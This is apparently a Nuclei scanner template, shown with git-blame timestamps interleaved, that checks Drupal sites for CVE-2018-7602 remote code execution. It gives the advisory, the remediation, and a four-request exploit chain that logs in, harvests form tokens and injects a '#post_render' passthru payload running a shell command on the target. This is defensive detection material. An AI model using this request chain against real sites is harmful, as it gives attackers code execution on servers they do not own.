2022-02-04 19:09:58 +00:00
id : CVE-2018-7602
2022-04-22 10:38:41 +00:00
2022-02-04 19:09:58 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Drupal - Remote Code Execution
2022-02-04 19:09:58 +00:00
author : princechaddha
severity : critical
2022-05-13 20:26:43 +00:00
description : Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
2023-09-27 15:51:13 +00:00
impact : |
Remote attackers can execute arbitrary code on the affected Drupal installations.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal.
2022-02-04 19:09:58 +00:00
reference :
- https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py
- https://nvd.nist.gov/vuln/detail/CVE-2018-7602
2022-05-17 09:18:12 +00:00
- https://www.drupal.org/sa-core-2018-004
- https://www.exploit-db.com/exploits/44557/
2023-07-15 16:29:17 +00:00
- http://www.securitytracker.com/id/1040754
2022-02-07 18:59:32 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-02-07 18:59:32 +00:00
cve-id : CVE-2018-7602
2024-01-29 17:11:14 +00:00
epss-score : 0.97448
epss-percentile : 0.99947
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
2022-07-07 06:45:48 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : drupal
product : drupal
2023-09-06 12:57:14 +00:00
shodan-query : http.component:"drupal"
2024-01-14 09:21:50 +00:00
tags : cve,cve2018,drupal,authenticated,kev,vulhub,edb
2022-02-04 19:09:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-04 19:09:58 +00:00
- raw :
- |
POST /?q=user%2Flogin HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
form_id=user_login&name={{username}}&pass={{password}}&op=Log+in
- |
GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1
Host : {{Hostname}}
- |
POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account
- |
POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
form_build_id={{form_build_id}}
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-02-04 19:09:58 +00:00
max-redirects : 2
matchers :
- type : word
words :
- 'CVE-2018-7602-POC'
extractors :
- type : regex
name : userid
group : 1
regex :
- '<meta about="([/a-z0-9]+)" property="foaf'
2023-07-11 19:49:27 +00:00
internal : true
part : body
2022-02-04 19:09:58 +00:00
- type : regex
name : form_token
group : 1
regex :
- '<input type="hidden" name="form_token" value="(.*)" />'
2023-07-11 19:49:27 +00:00
internal : true
part : body
2022-02-04 19:09:58 +00:00
- type : regex
name : form_build_id
group : 1
regex :
- '<input type="hidden" name="form_build_id" value="(.*)" />'
2023-07-11 19:49:27 +00:00
internal : true
part : body
2024-01-30 06:46:18 +00:00
# digest: 4a0a0047304502204dec12f369a9044e8dc3ba9c641723199442f60a3736e83f89caca37cd8118b5022100cda38fa6e52e8717c3073dff9123fc3707428e477982dd4549e372892f2a082e:922c64590222798bb761d5b6d8e72950